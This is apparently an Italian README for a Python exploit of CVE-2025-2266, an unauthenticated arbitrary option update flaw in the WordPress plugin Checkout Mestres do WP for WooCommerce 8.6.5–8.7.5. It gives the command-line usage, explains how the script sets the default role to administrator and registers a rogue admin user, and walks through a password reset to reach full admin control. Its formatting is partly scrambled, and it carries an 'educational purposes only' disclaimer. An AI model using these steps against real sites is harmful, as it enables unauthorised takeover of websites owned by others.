
Checkout Mestres do WP for WooCommerce 8.6.5 - 8.7.5 - Aggiornamento non autenticato di opzioni arbitrarie
Il plugin Checkout Mestres do WP for WooCommerce per WordPress è affetto da una vulnerabilità di aggiornamento arbitrario delle opzioni senza autenticazione nelle versioni 8.6.5 fino a 8.7.5.
La funzione vulnerabile cwmpUpdateOptions() non dispone di adeguati controlli di capacità, consentendo ad attaccanti non autenticati di aggiornare opzioni WordPress arbitrarie.
Un attaccante può:
administratorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HQuesto script Python sfrutta la vulnerabilità per:
administrator come ruolo predefinitorequests (installalo tramite pip install requests)8.6.5 – 8.7.5)Lo script controlla la versione del plugin tramite:
/wp-content/plugins/checkout-mestres-wp/readme.txt
Se il plugin è vulnerabile:
Registra un nuovo utente (predefinito: nxploited) con privilegi di amministratore
python CVE-2025-2266.py -u http://target.com/wordpress -newuser adminx -email [email protected]
| Opzione | Descrizione |
|---|---|
-u, |
usage: CVE-2025-2266.py [-h] -u URL [-newuser [NEWUSER]] [-email [EMAIL]]
CVE-2025-2266 Checkout Mestres do WP for WooCommerce Plugin Exploit
By : Nxploited | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL (e.g., http://example.com/wordpress)
-newuser [NEWUSER] Create new admin user (default username: nxploited)
-email [EMAIL] Email for new user (default: [email protected])
Una volta creato l'utente:
Visita la pagina di accesso:
http://target.com/wordpress/wp-login.php
Fai clic su "Hai dimenticato la password?"
[email protected])Imposta una password e ottieni pieno accesso da amministratore 🎯
Exploit di Nxploited | Khaled Alenazi
⚠️ Questo script è solo per scopi educativi e di test autorizzati.
--url| URL del sito WordPress di destinazione (Obbligatorio) |
-newuser | Crea un nuovo utente amministratore (nome utente predefinito: nxploited) |
-email | Email per il nuovo utente (predefinita: [email protected]) |